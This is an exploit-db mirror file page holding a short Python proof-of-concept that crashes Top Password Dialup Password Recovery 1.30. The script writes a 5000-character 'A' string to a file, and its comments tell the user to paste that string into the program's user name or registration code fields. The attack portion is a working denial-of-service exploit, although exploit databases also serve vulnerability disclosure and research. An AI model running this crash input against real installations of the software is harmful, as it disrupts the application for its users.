exploit-db-mirror/exploits/windows/dos/47907.py
Offensive Security 36c084c351 DB: 2021-09-03
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

17 lines
No EOL
513 B
Python
Executable file

# Exploit Title: Top Password Software Dialup Password Recovery 1.30 - Denial of Service (PoC)
# Date: 2020-01-12
# Exploit Author: Antonio de la Piedra
# Vendor Homepage: https://www.top-password.com/
# Software Link: https://www.top-password.com/download/DialupPRSetup.exe
# Version: 1.30
# Tested on: Windows 7 SP1 32-bit
# Copy paste the contents of poc.txt into the
# User Name / Registration Code input fields.
#!/usr/bin/python
poc =3D "A"*5000
file =3D open("poc.txt","w")
file.write(poc)
file.close()